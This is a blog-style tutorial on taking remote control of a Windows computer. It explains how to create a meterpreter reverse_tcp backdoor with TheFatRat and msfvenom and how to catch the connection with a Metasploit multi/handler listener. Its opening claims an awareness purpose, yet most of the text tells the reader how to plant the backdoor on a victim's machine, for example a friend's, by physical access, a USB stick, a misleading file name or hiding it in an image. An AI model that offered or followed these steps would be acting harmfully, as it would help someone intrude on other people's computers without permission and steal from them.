How to Hack Windows (step-by-step)
Many of the people doubt that whether their laptop or desktop can be hacked by a hacker.So the answer is yes, it can be easily hacked by a person having knowledge in ethical hacking or any kind of hacking. So here we will see how to hack windows, so that you should be aware of such attacks.
Before we begin this section ensure that you have kali linux installed in your system. You can check our how to install kali linux section for installing kali.
you can easily hack anyone’s windows if you have physical contact with it, like if it’s your friend’s computer or anyone you know.
Mainly social engineering works here in which you should be very good if you are serious about hacking.
Social engineering can give you access to many systems which even do not have vulnerability in it. It uses people as a vulnerability as every person is vulnerable at some point.
Here we will see hacking windows with the help of metasploit and fatrat which we had seen earlier in our android hacking section also.
You can download fatrat from github, just type fatrat github in your browser and you will see github page of fatrat tool. Simply copy the url and paste in your terminal by typing git clone <URL>.git
After this step fatrat get installed in your kali linux and then open the tool as — cd TheFatRat/. After getting inside fatrat you have to give permissions to execute by typing — chmod +x setup.sh. Now you are ready to go.
Now go inside fatrat folder and type ./fatrat as you can see in below image
As you can see from image we have to type 1 to go for msfvenom backdoor, and for starting, msfvenom is good as you have to be aware with metasploit also.
So after selecting 1 option in fatrat we get options as shown in image below.
Now you have to choose option 2 for creating windows backdoor. After this you will be asked for lport which is the port to listen incoming connections. Also it will ask for lhost which is our local ip for connecting.
After this you have to choose windows/meterpreter/reverse_tcp as some options pop up in front of you.
Now finally our windows backdoor is formed and is stored in output file inside fatrat folder.
You can keep name of backdoor as per your wish.
Now we have to start a listner which can listen to connections going or coming to kali. For this we use metasploit-framework here.
Now you have to open metasploit by typing msfconsole inside your terminal. Metasploit-framework is preinstalled in kali linux. You will get an interface as shown in image below.
Now simply type use exploit/multi/handler
After that type set payload windows/meterpreter/reverse_tcp.
A payload refers to the component of a computer virus that executes a malicious activity.
reverse_tcp is used because if we try to make connection with target then firewall could block us but in reverse case target try to make connection with us, hence connection not get blocked.
After above steps you have to write set lport <port number> and also set lhost <local ip>. Use lhost and lport same as used during backdoor creation in fatrat. You can check all options by typing show options. After this you have to type run or execute to start connection.
As discussed earlier that if you have physical contact with system then you can easily open your backdoor inside victim’s system. You can trick them by keeping some tricky name of your backdoor.
You can also embed your backdoor inside a picture through which your chances increase more and more.
Especially if you are in same network with your victim then you can easily perform attack through your apache web server.
we will see some special methods in upcoming article. First stick to basic method.
Here let’s assume that you put your backdoor file inside pendrive and open inside victim’s system. After doing this you will see a interface as making connection. Finally your session is created inside metasploit terminal.
So now you can type help inside the metasploit opened session and you will get all commands to run inside victim’s computer.
This is a very basic method that fails sometime if the victim is having some security in his device. So in next section we will see some advance methods.